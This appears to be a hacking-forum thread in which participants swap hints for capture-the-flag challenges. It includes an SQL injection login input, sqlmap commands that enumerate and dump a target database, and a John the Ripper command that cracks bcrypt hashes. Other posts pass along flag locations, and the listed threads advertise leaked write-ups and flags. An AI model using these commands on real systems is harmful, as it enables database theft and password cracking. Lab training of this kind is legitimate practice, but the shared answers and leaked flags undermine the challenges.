Possibly Related Threads…

NeoKrit · Mar 13, 2024, 07:50 AM

(Mar 10, 2024, 10:46 PM)mordekaiser Wrote: Any help with Fake Boost ? I have the generated keys, but I don't know what are useful for the rest ? (ps : the base64 code in the post request could be helpful but I couldn't do anything with it) so any help would be appreciated. thanks

Do you got some clues about it? Cause I'm still wondering. Any hints?

whunter · Mar 13, 2024, 08:33 AM

Anyone has a hint for "Oblique Final" about .DLL extracted ?

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Scraping | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

Spearfish5172 · Mar 13, 2024, 10:31 AM

(Mar 12, 2024, 09:49 AM)valer4ik312 Wrote: Who can help, with KORP Terminal???
I know I need to use SQLi, but I can't get the query right.
Here's what I tried: username=admin'+--+-+&password=a

Use sqlmap to inject random values. It will detect whether the 'username' and 'password' fields are injectable. Once injectable, dump the database. Voila!

Enumerate Database:

sqlmap -u “<Site_URL>" --dbs --forms --crawl=2 --ignore-code=401

Dump all:

sqlmap -u “<Site_URL>" --forms --crawl=2 --ignore-code=401 -D "korp_terminal" --dump-all

Save the password (bcrypt format) in a text file called crack.txt

John The Ripper:

john --wordlist=/usr/share/wordlists/rockyou.txt --format=bcrypt crack.txt

random24 · Mar 13, 2024, 11:12 AM

(Mar 13, 2024, 10:31 AM)Spearfish5172 Wrote:
(Mar 12, 2024, 09:49 AM)valer4ik312 Wrote: Who can help, with KORP Terminal???
I know I need to use SQLi, but I can't get the query right.
Here's what I tried: username=admin'+--+-+&password=a

Use sqlmap to inject random values. It will detect whether the 'username' and 'password' fields are injectable. Once injectable, dump the database. Voila!

Enumerate Database:

sqlmap -u “<Site_URL>" --dbs --forms --crawl=2 --ignore-code=401

Dump all:

sqlmap -u “<Site_URL>" --forms --crawl=2 --ignore-code=401 -D "korp_terminal" --dump-all

Save the password (bcrypt format) in a text file called crack.txt

John The Ripper:

john --wordlist=/usr/share/wordlists/rockyou.txt --format=bcrypt crack.txt

password123

yoshihtb2 · Mar 13, 2024, 11:36 AM

Any last minute tips for Delulu and Writing on the Wall? Only very easy challenges I am missing.

RealRomAlex · Mar 13, 2024, 11:53 AM

Data Siege i found 2/3 part flag. A hint for another perhaps

nnrrkk · Mar 13, 2024, 12:07 PM

(Mar 13, 2024, 11:53 AM)RealRomAlex Wrote: Data Siege i found 2/3 part flag. A hint for another perhaps

1/3 ssh-key, 2/3 credentials.txt, 3/3 at the end

NeoKrit · Mar 13, 2024, 01:20 PM

Guys in "Phreaky" we have some files from http, what exact file is needed to work with?
Would be thankful

Spearfish5172 · Mar 13, 2024, 01:37 PM

I'm stuck in solving the Tutorial, under Pwn Section. Does anyone know the answer?

Q7: What's the number you can add to INT_MAX to get the number -2147482312?

Even ChatGPT can't solve it.

JustRandomDude · Mar 13, 2024, 01:41 PM

(Mar 13, 2024, 01:20 PM)NeoKrit Wrote: Guys in "Phreaky" we have some files from http, what exact file is needed to work with?
Would be thankful

not http, IMF only

Possibly Related Threads…
Thread		Author	Replies	Views	Last Post
	[FREE] CPTS 12 FLAGS	pulsebreaker	66	1,773	2 hours ago Last Post: vlka
	[FREE] 300+ Writeups PDF HackTheBox/HTB premium retired	Tamarisk	370	92,495	7 hours ago Last Post: lifolifo007
	Hack the box Pro Labs, VIP, VIP+ 1 month free Method	RedBlock	23	2,208	10 hours ago Last Post: kkkato
	[FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags	Techtom	20	2,521	Apr 29, 2026, 11:06 PM Last Post: op334
	[FREE] HackTheBox All Cheatsheets	Tamarisk	3	414	Apr 29, 2026, 10:36 PM Last Post: op334